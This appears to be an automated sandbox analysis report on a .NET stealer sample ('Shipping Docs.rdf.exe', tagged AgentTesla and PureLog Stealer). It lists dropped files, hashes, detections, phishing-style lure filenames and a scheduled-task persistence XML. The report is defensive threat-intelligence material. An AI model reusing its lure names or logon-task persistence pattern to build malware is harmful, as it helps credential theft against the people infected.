	New Point of Contact for Corporate Courier Account - DHL.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	bank slip.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	PAYMENT LIST.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	E7236252-receipt.vbs	Get hash	malicious	XWorm	Browse
	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse
	Transfer copy PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7066931759349981
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqZ:2JIB/wUKUKQncEmYRTwh0d
MD5:	424C86203EE79E3BA00E1843D2273442
SHA1:	023D96581FBC380ED1428F785F17847CB65C0B8C
SHA-256:	E4D082CD1712392DE143C3DCE2ED322B2B757611E47999A51164A90970B97158
SHA-512:	E4FE1FF7DF451139124C2D44D89350B7A750EBB2F0761DB2B64F0DE94118C8A74935089DDA8A45F69D874817FF11998D78388471A10436F3FB21345248C63A39
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x937ffc4b, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7899668915619623
Encrypted:	false
SSDEEP:	1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
MD5:	F16798D0DAF6B609CE9738BCEF4CBEC1
SHA1:	7A22AE4542BF30E21975ACE4D40087FA8C73F4E8
SHA-256:	6483F9EFB39C17C8EA0E5E3E995AD4470D8219B89435AB0A196B76D414066C15
SHA-512:	73AD8F9C761B2C9B60E0B9FD3152C56E39E7E366BB4109C658AE6649354AA8F0C6A979390F4B360ABE98EC6FB22D0731D08A0A37EDFC8E7239C244E57F24FD29
Malicious:	false
Preview:	...K... ...............X\...;...{......................0.`.....42...{5.7....\|M.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{......................................7....\|M.................-.n.7....\|M..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08193220428518491
Encrypted:	false
SSDEEP:	3:lell/EYellxg1t/57Dek3JEASCP/ollEqW3l/TjzzQ/t:lel6zllxgHR3tESPAmd8/
MD5:	5FD4DE2DC97B4D4CCD0CFCC3037A00E5
SHA1:	2BD0B1A1458914D8CC37B4FD5BA15C608123A760
SHA-256:	FB8D83501D9C86232BCE41D6C1696FF7266E44DDDE012CC752BEC81E98F1E880
SHA-512:	3A371CFDD8F951C3468FAB29307E12819DE96F6E519A5390950A9DCCB21E0E5B78E1204C935C65D7C7F5367D4E6BD7CF3CC59CA460BB43970734E3EF84168D0E
Malicious:	false
Preview:	G.Q......................................;...{..7....\|M.42...{5.........42...{5.42...{5...Y.42...{59................-.n.7....\|M.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SVcPIbJno.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\SVcPIbJno.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Docs.rdf.exe.log

Download File

Process:	C:\Users\user\Desktop\Shipping Docs.rdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\boqXv.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHxvIIwLgZ2KRHWLOug8s
MD5:	AF15464AFD6EB7D301162A1DC8E01662
SHA1:	A974B8FEC71BF837B8E72FE43AB43E447FC43A86
SHA-256:	103A67F6744C098E5121D2D732753DFA4B54FA0EFD918FEC3941A3C052F5E211
SHA-512:	7B5B7B7F6EAE4544BAF61F9C02BF0138950E5D7D1B0457DE2FAB2C4C484220BDD1AB42D6884838E798AD46CE1B5B5426CEB825A1690B1190857D3B643ABFAB37
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alzjplra.dku.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_deb1u32u.f5h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdt1xv5f.z1e.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4ixhizk.s5f.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0oe3fx2.bso.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkwracat.o5d.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tt5r34p3.sb2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmdmyaw5.rbb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp59D.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\SVcPIbJno.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1603
Entropy (8bit):	5.122805929585587
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYoxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTYIv
MD5:	8E37546E105C8186E75E11705E172F89
SHA1:	302FED7DDF4B5031A3C621F47862845FB3962D05
SHA-256:	313FA80567376BB3CA096061220E276AD14456B40963B1510C55844BA8F95A76
SHA-512:	93F1CA829FFF1A91D39001B58E71154ADFE340B36B3086822F423A07B80997EB1B0B673AE98A5F3A5606AA903A6BE3DA9EE0F3837993D4165C3924C2F82584F1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmpF63B.tmp

Download File

Process:	C:\Users\user\Desktop\Shipping Docs.rdf.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1603
Entropy (8bit):	5.122805929585587
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYoxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTYIv
MD5:	8E37546E105C8186E75E11705E172F89
SHA1:	302FED7DDF4B5031A3C621F47862845FB3962D05
SHA-256:	313FA80567376BB3CA096061220E276AD14456B40963B1510C55844BA8F95A76
SHA-512:	93F1CA829FFF1A91D39001B58E71154ADFE340B36B3086822F423A07B80997EB1B0B673AE98A5F3A5606AA903A6BE3DA9EE0F3837993D4165C3924C2F82584F1
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\SVcPIbJno.exe

Download File

Process:	C:\Users\user\Desktop\Shipping Docs.rdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	742920
Entropy (8bit):	7.9251722256375015
Encrypted:	false
SSDEEP:	12288:qYE8BkorZInC3yGs1X1UmaSudfjMmxdB/L+6Jhwd/SHGkR:BE8BT9Eusp1UmaS8oCBMQHd
MD5:	F2BCF5A8F702DFE1879495F5428D2C2A
SHA1:	47CE34D0266E5D0B2A884D1E53EE8099124EB3D7
SHA-256:	D7F670F5225888DDB631D26CCDB01A8C514965D48E15F3913348DB8949B606FC
SHA-512:	C8A8C2293927B97C33599F77D343F2B91C31F814790E7FF4891998EBDF12A149AB33A7E44B471043ABDF1F38E9386F6E30A1ADCEBCCA4E5F51EF328B3773B128
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32% Antivirus: Virustotal, Detection: 44%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z9f..............0...... ........... ... ....@.. .......................`............@.................................x...O.... ............... ...6...@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SVcPIbJno.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Shipping Docs.rdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	45984
Entropy (8bit):	6.16795797263964
Encrypted:	false
SSDEEP:	768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
MD5:	9D352BC46709F0CB5EC974633A0C3C94
SHA1:	1969771B2F022F9A86D77AC4D4D239BECDF08D07
SHA-256:	2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
SHA-512:	13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: MAR-2024 SOA.exe, Detection: malicious, Browse Filename: New Point of Contact for Corporate Courier Account - DHL.exe, Detection: malicious, Browse Filename: MAR-2024 SOA.exe, Detection: malicious, Browse Filename: New Point of Contact for Corporate Courier Account - DHL.exe, Detection: malicious, Browse Filename: bank slip.exe, Detection: malicious, Browse Filename: PAYMENT LIST.exe, Detection: malicious, Browse Filename: E7236252-receipt.vbs, Detection: malicious, Browse Filename: I7336446-receipt.vbs, Detection: malicious, Browse Filename: S94847456-receipt.vbs, Detection: malicious, Browse Filename: Transfer copy PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1141
Entropy (8bit):	4.442398121585593
Encrypted:	false
SSDEEP:	24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
MD5:	6FB4D27A716A8851BC0505666E7C7A10
SHA1:	AD2A232C6E709223532C4D1AB892303273D8C814
SHA-256:	1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
SHA-512:	3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
Malicious:	false
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9251722256375015
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Shipping Docs.rdf.exe
File size:	742'920 bytes
MD5:	f2bcf5a8f702dfe1879495f5428d2c2a
SHA1:	47ce34d0266e5d0b2a884d1e53ee8099124eb3d7
SHA256:	d7f670f5225888ddb631d26ccdb01a8c514965d48e15f3913348db8949b606fc
SHA512:	c8a8c2293927b97c33599f77d343f2b91c31f814790e7ff4891998ebdf12a149ab33a7e44b471043abdf1f38e9386f6e30a1adcebcca4e5f51ef328b3773b128
SSDEEP:	12288:qYE8BkorZInC3yGs1X1UmaSudfjMmxdB/L+6Jhwd/SHGkR:BE8BT9Eusp1UmaS8oCBMQHd
TLSH:	58F4228AF3483B71D0BD8BF19045610617F8A41FA5B6D72F4ED360DD2AA1F128A90F67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z9f..............0...... ........... ... ....@.. .......................`............@................................

File Icon


Icon Hash:	3470b89eb29a90c0

Static PE Info

General

Entrypoint:	0x4b12ca
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
